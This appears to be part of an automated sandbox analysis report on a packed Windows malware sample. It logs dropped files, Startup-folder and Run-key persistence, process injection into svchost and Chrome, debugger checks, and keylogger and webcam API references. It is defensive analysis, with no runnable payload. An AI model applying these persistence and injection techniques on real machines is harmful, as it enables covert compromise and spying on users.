Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_10004D60 push 10004D8Ch; ret	0_2_10004D84
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_10006630 push 1000665Ch; ret	0_2_10006654
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000966C push 100096F4h; ret	0_2_100096EC
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000B6C0 push 1000B6ECh; ret	0_2_1000B6E4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_100096F6 push 10009781h; ret	0_2_10009779
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_100096F8 push 10009781h; ret	0_2_10009779
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000AF90 push 1000AFBCh; ret	0_2_1000AFB4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000AFC8 push 1000AFBCh; ret	0_2_1000AFB4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000CFE0 push 1000D02Eh; ret	0_2_1000D026
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_1000C038 push 1000C064h; ret	1_2_1000C05C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_1000619C push 100061D4h; ret	1_2_100061CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_100051A0 push 100051CCh; ret	1_2_100051C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_100099C0 push 100099ECh; ret	1_2_100099E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_1000A240 push 1000A26Ch; ret	1_2_1000A264
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_100052B0 push 100052FCh; ret	1_2_100052F4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_10004AF8 push 10004B49h; ret	1_2_10004B41

Source: 7FW4ce2RDy.exe

Static PE information: section name: .imports

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Executable created and started: C:\Windows\SysWOW64\562Server.exe

Jump to behavior

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	File created: C:\Windows\SysWOW64\562Server.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\562Server.exe	File created: C:\Users\user\AppData\Local\Temp\System.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\System.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe	Jump to dropped file

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

File created: C:\Windows\SysWOW64\562Server.exe

Jump to dropped file

Boot Survival:

Drops PE files to the startup folder

Show sources

Source: C:\Users\user\AppData\Local\Temp\System.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe

Jump to dropped file

Creates autostart registry keys with suspicious names

Show sources

Source: C:\Users\user\AppData\Local\Temp\System.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\System.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\System.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\System.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe			Jump to behavior

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\562Server.exe TID: 3032	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe TID: 4940	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe TID: 4632	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe TID: 5252	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\System.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\562Server.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\System.exe

Window / User API: threadDelayed 6064

Jump to behavior

Source: C:\Windows\SysWOW64\562Server.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: 7FW4ce2RDy.exe	Binary or memory string: jiejwogfdjieovevodnvfnievngsegtsrgrefsfsfsgrsgrttrhgtehgfsgrfgtrwegtrejytjyegrsfvfbgfsdfhgtrfsgfrsgfgregtregtrfrgjbfdkbnfsdjbvofsjfrfreSVWU
Source: 7FW4ce2RDy.exe, svchost.exe	Binary or memory string: trhgtehgfsgrfgtrwegtre

Source: C:\Users\user\AppData\Local\Temp\System.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_10005CA4 FindFirstFileW,FindClose,

0_2_10005CA4

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\System.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\562Server.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 10000000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 10000000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 10000000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 10000000 value starts with: 4D5A			Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_1000BD14 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,

0_2_1000BD14

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1000C9D0

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 10000000			Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 10000000			Jump to behavior

.NET source code references suspicious native API functions

Show sources

Source: 562Server.exe.0.dr, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 562Server.exe.0.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: System.exe.4.dr, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: System.exe.4.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 4.2.562Server.exe.1d0000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 4.2.562Server.exe.1d0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 4.0.562Server.exe.1d0000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 4.0.562Server.exe.1d0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 301b5fcf8ce2fab8868e80b6c1f912fe.exe.8.dr, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 301b5fcf8ce2fab8868e80b6c1f912fe.exe.8.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 8.0.System.exe.3e0000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 8.0.System.exe.3e0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 8.2.System.exe.3e0000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 8.2.System.exe.3e0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.0.System.exe.d50000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 16.0.System.exe.d50000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.2.System.exe.d50000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 16.2.System.exe.d50000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 19.0.System.exe.3e0000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 19.0.System.exe.3e0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 19.2.System.exe.3e0000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 19.2.System.exe.3e0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 20.2.System.exe.240000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 20.2.System.exe.240000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 20.0.System.exe.240000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 20.0.System.exe.240000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')

Contains functionality to inject threads in other processes

Show sources

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_100098A8 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,

0_2_100098A8

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process created: C:\Windows\SysWOW64\562Server.exe 'C:\Windows\system32\562Server.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe'	Jump to behavior

Source: System.exe, 00000008.00000002.560209527.0000000002C76000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: System.exe, 00000008.00000002.559411503.0000000001190000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: System.exe, 00000008.00000002.559411503.0000000001190000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: System.exe, 00000008.00000002.559411503.0000000001190000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: GetLocaleInfoA,

0_2_10004A84

